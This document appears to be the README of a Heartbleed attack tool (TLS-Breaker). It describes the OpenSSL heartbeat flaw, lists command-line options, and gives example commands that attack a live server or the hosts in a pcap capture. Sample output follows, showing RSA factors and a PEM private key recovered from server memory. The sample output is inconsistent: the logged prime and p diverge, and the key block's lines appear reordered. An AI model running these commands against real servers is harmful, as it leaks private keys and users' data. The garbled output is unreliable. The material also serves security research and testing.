-
Notifications
You must be signed in to change notification settings - Fork 1
Heartbleed Attack
Heartbleed is an attack exploiting a bug in OpenSSL's implementation of the TLS/DTLS. An exploit of this vulnerability causes memory contents to leak from the server to the client and vice versa. If this attack is successful, the attacker gets access to the contents of the server's memory. This leads to leakage of the server's private key and other personal information stored in the memory. Using the private key the attacker can eavesdrop on the communication.
An implementation mistake in the heartbeat extension is the main reason for the Heartbleed attack. The extension allows clients to send and receive heartbeat messages (heartbeats) to the server in order to verify that a TLS/DTLS connection is still active.
Heartbeat information and extension can be found in RFC6520.
OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable to Heartbleed.
For more information about the attack, please refer to http://heartbleed.com/.
java -jar Heartbleed.jar -pcap (PCAP file name)
OR
java -jar Heartbleed.jar -connect (Server to connect)
-cipher:
TLS cipher suites to use, divided by a comma.
e.g. TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA
-config
This parameter allows you to specify a default TlsConfig
-connect
Who to connect to. Syntax: localhost:4433
-debug
Show extra debug output (sets logLevel to DEBUG)
Default: false
-dump
Dumps the raw server data to the specified file.
-executeAttack, -execute_attack
If this value is set the Attack is not only Tested, but also executed
(WARNING)
Default: false
-heartbeats
Number of heartbeat messages to be sent.
Default: 1
-h, -help
Prints usage for all the existing commands.
-keylogfile
Path to the keylogfile
-payload_length
Payload length sent in the client heartbeat message
Default: 65535
-pcap
Location of the pcap file that will be used for the Attack.
-process_dump
Location of the text file (memory dump) that will be used to search for
the private key.
-quiet
No output (sets logLevel to NONE)
Default: false
-server_name
Server name for the SNI extension.
-skipConnectionCheck, -skip_connection_check
If set to true the Attacker will not check if the target is reachable.
Default: false
-starttls
Starttls protocol
Default: NONE
Possible Values: [NONE, FTP, IMAP, POP3, SMTP]
-version
Highest supported protocol version
Possible Values: [SSL2, SSL3, TLS10, TLS11, TLS12, TLS13, TLS13_DRAFT14, TLS13_DRAFT15, TLS13_DRAFT16, TLS13_DRAFT17, TLS13_DRAFT18, TLS13_DRAFT19, TLS13_DRAFT20, TLS13_DRAFT21,TLS13_DRAFT22, TLS13_DRAFT23, TLS13_DRAFT24, TLS13_DRAFT25, TLS13_DRAFT26, TLS13_DRAFT27, TLS13_DRAFT28, DTLS10, DTLS12, GREASE_00, GREASE_01, GREASE_02, GREASE_03, GREASE_04, GREASE_05, GREASE_06, GREASE_07, GREASE_08, GREASE_09, GREASE_10, GREASE_11, GREASE_12, GREASE_13, GREASE_14, GREASE_15]
Running an attack based on the recorded connections stored in “Sample_pcap.pcapng”.
java -jar Heartbleed.jar -pcap “Sample_pcap.pcapng”
Attacking a known server (let's say localhost:4433).
java -jar Heartbleed.jar -connect localhost:4433 -executeAttack
Normal attack command
java -jar Heartbleed.jar -pcap "Heartbleed.pcapng" -heartbeats 10
Advanced analysis option usage
- Analyze the server in the pcap file and store the fetched buffer data into a text file using the -dump parameter for further analysis.
java -jar Heartbleed.jar -pcap " Heartbleed.pcapng" -dump "HeartbleedDump.txt" -heartbeats 200
- Attack the server present in the pcap file using the file that contains buffer data. External buffer files can be added using the -process_dump parameter.
java -jar Heartbleed.jar -pcap "Heartbleed.pcapng" -process_dump "D:\downloads\HeartbleedDump.txt"
Part 1:
Ensure that the server which is used for the attack is up and running.
Part 2:
- Open the terminal from the “apps” folder.
- Execute the command mentioned in the command section
Part 3:
Executing the command with the "-connect" option will start the attack, Wait for the attack to finish, it might take a while.
OR
Executing the command with the pcap file, a list of servers along with the session counts, which may be potentially vulnerable to the Heartbleed attack is displayed.
If the server count is 1: The user is directly allowed to check the vulnerability.
Found 1 server from the pcap file.
┌─────────────┬────────────────────┬────────┬─────────────┐
│Server Number│Host Address │Hostname│Session Count│
├─────────────┼────────────────────┼────────┼─────────────┤
│ 1│131.234.28.126:10004│- │ 1│
└─────────────┴────────────────────┴────────┴─────────────┘
Do you want to check the vulnerability of the server? (y/n):
If the server count is 2 or more: The user can select a server out of that list to check the vulnerability or the user can check the vulnerability of all the servers by selecting option “a”.
Vulnerability check:
Selecting vulnerable checks will start checking for the vulnerability of the server.
If the server is vulnerable, users are provided with options on whether to start or end the attack.
After Selecting ‘Y’, Wait for the attack to finish, it might take a while.
TLS-Breaker searches for a private key in the memory buffer of the server. If found, the secret private key is displayed along with the prime and components of the private key (p, q, phi and d).
20:31:08 [main] INFO : HeartbleedAttacker - Prime found!
20:31:08 [main] INFO : HeartbleedAttacker - prime =1395721061012848647565876790642821998206039987856114205498330733874112332389149097530
1571689779392303189589799520123322442539525956588905118375764132153735186472618438557433978012316786189868442672387650287197168
20:31:08 [main] INFO : HeartbleedAttacker - Calculated values:
20:31:08 [main] INFO : HeartbleedAttacker - p =13957210610128486475658767906428219982060399878561142054983307338741123323891499
68977939230318958979952012332244253952595658890511837576413215373518647261843855743397801231678618982238376556414573687957
20:31:08 [main] INFO : HeartbleedAttacker - q = 17021981151607245608249733190147704703540397719966522185989409502056355759
651633859690022345543604994519762040347152375760478244576707696036659068638654159462116340388775448227614434647754271641750392
20:31:08 [main] INFO : HeartbleedAttacker - phi = 2375793759346197613232390700703668568798416195660290877006301603477054528347614494328878200243930
87566192692788077026192754774946157436738964680463918393901459701834049784657395922882314149785470802385830805221033674888194
2119608144072164523278264244547303825684279000902792588312242189479298502130264679640286289485556905427835985619507795053150307
6848600868699397263440440843714775143960133009137214067923332400677148516743897179079738412051753279864640187880832
20:31:08 [main] INFO : HeartbleedAttacker - d = 3686382766802185563721284318088347906695621449512412519382498589462161450595372353453829503
030030897502472691663354030002513843202852104252191303780146132406190741135703364479645481074299
0276412058376810614106063792995294312883305006034725888386572849153706580445573145888143762739035526430323904180663003415
20:31:09 [main] INFO : HeartbleedAttacker - Encoded private key:
-----BEGIN RSA PRIVATE KEY-----
OrBCTanpzLUPWtGMc4Djux6X2+B3exBYB3sj4JjXl6Hs4DbwmpcLsCAhrE3ScgQN
/zA/XIhWpQOPOYBq8gfAYMMTXuCJ6rT0NooXyiPB1/AiqB3fYjFOZIwQogJxbMN/
y06SIzhkPOVXMlUZc9Vc64pcWe4d+DXq16ehOyAQR693zyuY4zBqQ4e+tybYv9Wy
af2tgH2XhxRJsb0u9s0AtrxPQL8TxcA/tfD79QIDAQABAoIBAB0zp5/Zs6iXj/v9
MIIEowIBAAKCAQEAvDL5XdvjKEjrhZg4qv9Es0z14uxiARgZ9UNX8St+qVsG730m
FCkXmpPp234OqrSGrh6aRBVTKnJpcalb6pwXjarYlteThGuV4psZSjkmE9TYfXcq
v6VA0K8lnO2mEhrrW3PEDEw+nHu4xR26BKgKG3rHKPKX18xrUazWaRJakpHhM2U4
-----END RSA PRIVATE KEY-----
The private key can be further used to generate signatures or decrypt ciphertexts.